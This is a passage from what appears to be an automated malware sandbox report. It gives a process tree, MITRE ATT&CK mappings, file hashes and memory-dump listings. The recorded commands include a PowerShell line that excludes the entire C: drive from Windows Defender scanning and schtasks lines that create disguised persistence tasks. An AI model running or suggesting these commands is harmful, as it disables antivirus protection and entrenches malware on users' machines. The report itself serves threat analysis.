- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:488

C:\Users\Admin\AppData\Local\Temp\ys.exe
"C:\Users\Admin\AppData\Local\Temp\ys.exe"
4⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 20
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rlifexonjiantfxwzaeufs.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Local\Chromes.exe'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rlifexonjiantfxwzaeufs.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:3832

C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exe
"C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 20
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:308

C:\Users\Admin\AppData\Local\Temp\ys.exe
C:\Users\Admin\AppData\Local\Temp\ys.exe
5⤵
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp615B.tmp"
6⤵
- Creates scheduled task(s)
PID:2324

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp6321.tmp"
6⤵
- Creates scheduled task(s)
PID:3052

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
66382a4ca6c4dcf75ce41417d44be93e

SHA1
8132cbef1c12f8a89a68a6153ade4286bf130812

SHA256
a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

SHA512
2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
65b28b7f713710549406ff847a44a177

SHA1
04fb15b859dce252681c3041d87697af9024d192

SHA256
8436b25bc6074a0c8a4feadbdb7e81ae3f38770cac11525824829383a7989a56

SHA512
bf7a0b12da8e55771b2aa2344d335ac8b13b5f479b7ff82005061deb3158ee2ab1b5333969b3622e8ea3ae7cd562b2d1959aec97dc3efed3b728ddf35c31bdf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bb23d9f15f9602a56def45632822100f

SHA1
5a9f631d0e28f46108bea88139043dc3b0660dc4

SHA256
c26e226efb4b23609dad61af3ed7eb30ff65b166ffa0157118acf11888dafa1a

SHA512
47b9452d9e27ed4a9b480178c4368c159df36b54484b08b2e17eb10bb1f0d0c8c0161764fb993d6b80e51645b917642311903c3826e840d18db3bc5a37b3444e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
263e58658c7c65961c44ce8fdd63586c

SHA1
b4e04a4def8ba9882177bc0801955db58237c975

SHA256
34a1091b8feebf3966570ad52c3e50aa9d719d98d9f50d60822dddc2af43c8cb

SHA512
a1edce48d15b2e03b0ded316733a9400d2e758be5e91f12249bd92349f385196c99c0d98bd92510fe7fbe9f0a57f83031f0f3b9e74edb3e519cf19a7247fc6ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exe
MD5
45e7f37bccbd54018df2b32d0f7acf58

SHA1
97f97e12f74ab4c50b4b9b40c561fb1cd889629c

SHA256
561d3fee6276834f78aadbb7dec4025b1e7cb2102ce864fa5da037da086da67a

SHA512
27a232ea644e497cd2a45241535cc9dd703fe72b9b8ca785bcfc2de98e9bd0ba16744c6e3e505afc214d9538ea900bdf5cf84f0cb7e5bfa54e86389295d2acee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exe
MD5
45e7f37bccbd54018df2b32d0f7acf58

SHA1
97f97e12f74ab4c50b4b9b40c561fb1cd889629c

SHA256
561d3fee6276834f78aadbb7dec4025b1e7cb2102ce864fa5da037da086da67a

SHA512
27a232ea644e497cd2a45241535cc9dd703fe72b9b8ca785bcfc2de98e9bd0ba16744c6e3e505afc214d9538ea900bdf5cf84f0cb7e5bfa54e86389295d2acee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rlifexonjiantfxwzaeufs.vbs
MD5
eca342e6e0def7cb71365b69223fa9d0

SHA1
cd87cc22065c4250c8e32381104d9fd92a34892d

SHA256
cfd25af24487bb69b97ea662d11d9bbed7fdbdcd8ac6c6ef201b9498fef5b69f

SHA512
0899ddd601167fa720bc4f7194996d07e1f9ea38ff57c939ec23c8ece3f25fa6674210a25fae5d2ee5b30aff7e936fb53c34d8c2afdef4ff99f7c92c6462a196

Download Submit
C:\Users\Admin\AppData\Local\Temp\_Rlifexonjiantfxwzaeufs.vbs
MD5
7002eb22ceea392ed6e52904a17ed59d

SHA1
5026935720bf88bf1d7f24f80ac2e77dc043cacd

SHA256
ce4aaa692483b8efb6ddc068fc2295113996518faf14710876e820442de47232

SHA512
f559401a4dc549c76de0729dc1b25129d5bef22b1d8f3692edc8d787194774b7fb20e3a13f13acad70f4be0aa03ef9df72cc39dbd60cbf821dbcabeec0f237e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp615B.tmp
MD5
e48abc132ef1655f9b02d6be27db6a8e

SHA1
d093a5e0ddbdc0e659446aa2a4e3d026fb8b0b1b

SHA256
75a8016220f808bc17202846145efb39dd1410b794b449524de60803320b3b4b

SHA512
ba824be5bda0b5b061108f50b9974ed2a38ed7ab158ccf4079d5dd21b004d3057e37bbb2fd55006747e241bcb67aa51bfd7fed17a9e5e81a7392296b721b3cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6321.tmp
MD5
4e71faa3a77029484cfaba423d96618f

SHA1
9c837d050bb43d69dc608af809c292e13bca4718

SHA256
c470f45efd2e7c4c5b88534a18965a78dce0f8e154d3e45a9d5569ad0e334bdb

SHA512
6d014de41352f2b0b494d94cd58188791e81d4e53578d0722110b6827793b735e19c614877f25c61b26233dea1b5f1998ba1240bdc8fa04c87b7e64a4ca15fe0

Download Submit
memory/308-805-0x0000000007493000-0x0000000007494000-memory.dmp

Filesize
4KB

Download
memory/308-501-0x0000000000000000-mapping.dmp

Download
memory/308-519-0x0000000007492000-0x0000000007493000-memory.dmp

Filesize
4KB

Download
memory/308-517-0x0000000007490000-0x0000000007491000-memory.dmp

Filesize
4KB

Download
memory/488-351-0x00000185ADCE0000-0x00000185ADCE1000-memory.dmp

Filesize
4KB

Download
memory/488-397-0x00000185ADA86000-0x00000185ADA88000-memory.dmp

Filesize
8KB

Download
memory/488-390-0x00000185ADDC0000-0x00000185ADDC1000-memory.dmp

Filesize
4KB

Download
memory/488-276-0x00000185ADD40000-0x00000185ADD41000-memory.dmp

Filesize
4KB

Download
memory/488-284-0x00000185ADA83000-0x00000185ADA85000-memory.dmp

Filesize
8KB

Download
memory/488-431-0x00000185ADA88000-0x00000185ADA89000-memory.dmp

Filesize
4KB

Download
memory/488-273-0x00000185ADB90000-0x00000185ADB91000-memory.dmp

Filesize
4KB

Download
memory/488-261-0x0000000000000000-mapping.dmp

Download
memory/488-283-0x00000185ADA80000-0x00000185ADA82000-memory.dmp

Filesize
8KB

Download
memory/656-251-0x0000000000000000-mapping.dmp

Download
memory/896-496-0x0000000004BE2000-0x0000000004BE3000-memory.dmp

Filesize
4KB

Download
memory/896-606-0x0000000004BE3000-0x0000000004BE4000-memory.dmp

Filesize
4KB

Download
memory/896-500-0x0000000008070000-0x0000000008071000-memory.dmp

Filesize
4KB

Download
memory/896-511-0x00000000089A0000-0x00000000089A1000-memory.dmp

Filesize
4KB

Download
memory/896-474-0x0000000000000000-mapping.dmp

Download
memory/896-493-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/896-538-0x000000007E0E0000-0x000000007E0E1000-memory.dmp

Filesize
4KB

Download
memory/1844-468-0x000000000041E792-mapping.dmp

Download
memory/1844-509-0x0000000005A10000-0x0000000005A29000-memory.dmp

Filesize
100KB

Download
memory/1844-467-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1844-512-0x0000000005C10000-0x0000000005C13000-memory.dmp

Filesize
12KB

Download
memory/1844-473-0x0000000005880000-0x0000000005881000-memory.dmp

Filesize
4KB

Download
memory/1844-491-0x0000000005740000-0x0000000005C3E000-memory.dmp

Filesize
5.0MB

Download
memory/1844-508-0x0000000005A00000-0x0000000005A05000-memory.dmp

Filesize
20KB

Download
memory/2324-486-0x0000000000000000-mapping.dmp

Download
memory/3052-498-0x0000000000000000-mapping.dmp

Download
memory/3136-476-0x0000000000000000-mapping.dmp

Download
memory/3136-479-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/3136-492-0x0000000004D40000-0x0000000004D8A000-memory.dmp

Filesize
296KB

Download
memory/3136-494-0x0000000004B10000-0x000000000500E000-memory.dmp

Filesize
5.0MB

Download
memory/3564-429-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/3564-434-0x0000000005120000-0x000000000561E000-memory.dmp

Filesize
5.0MB

Download
memory/3564-399-0x0000000000000000-mapping.dmp

Download
memory/3564-461-0x0000000007540000-0x00000000075E2000-memory.dmp

Filesize
648KB

Download
memory/3564-427-0x0000000000640000-0x0000000000641000-memory.dmp

Filesize
4KB

Download
memory/3564-430-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/3564-432-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/3564-433-0x0000000007420000-0x00000000074F4000-memory.dmp

Filesize
848KB

Download
memory/3660-463-0x0000000000000000-mapping.dmp

Download
memory/3740-447-0x0000000007CE0000-0x0000000007CE1000-memory.dmp

Filesize
4KB

Download
memory/3740-448-0x0000000008830000-0x0000000008831000-memory.dmp

Filesize
4KB

Download
memory/3740-444-0x0000000006F40000-0x0000000006F41000-memory.dmp

Filesize
4KB

Download
memory/3740-443-0x0000000007EE0000-0x0000000007EE1000-memory.dmp

Filesize
4KB

Download
memory/3740-442-0x0000000007E70000-0x0000000007E71000-memory.dmp

Filesize
4KB

Download
memory/3740-441-0x0000000007C20000-0x0000000007C21000-memory.dmp

Filesize
4KB

Download
memory/3740-440-0x0000000007510000-0x0000000007511000-memory.dmp

Filesize
4KB

Download
memory/3740-439-0x0000000007580000-0x0000000007581000-memory.dmp

Filesize
4KB

Download
memory/3740-438-0x0000000006DF0000-0x0000000006DF1000-memory.dmp

Filesize
4KB

Download
memory/3740-435-0x0000000000000000-mapping.dmp

Download
memory/3740-462-0x0000000006F43000-0x0000000006F44000-memory.dmp

Filesize
4KB

Download
memory/3740-445-0x0000000006F42000-0x0000000006F43000-memory.dmp

Filesize
4KB

Download
memory/3740-449-0x00000000085D0000-0x00000000085D1000-memory.dmp

Filesize
4KB

Download
memory/3740-454-0x0000000009C10000-0x0000000009C11000-memory.dmp

Filesize
4KB

Download
memory/3740-455-0x00000000092E0000-0x00000000092E1000-memory.dmp

Filesize
4KB

Download
memory/3832-464-0x0000000000000000-mapping.dmp

Download
memory/3940-115-0x00007FF648A70000-0x00007FF64C026000-memory.dmp

Filesize
53.7MB

Download
memory/3940-123-0x00007FFF5BD50000-0x00007FFF5DC45000-memory.dmp

Filesize
31.0MB

Download
memory/3940-124-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmp

Filesize
64KB

Download
memory/3940-122-0x00007FFF5DC50000-0x00007FFF5ED3E000-memory.dmp

Filesize
16.9MB

Download
memory/3940-119-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmp

Filesize
64KB

Download
memory/3940-118-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmp

Filesize
64KB

Download
memory/3940-117-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmp

Filesize
64KB

Download
memory/3940-116-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmp

Filesize
64KB

Download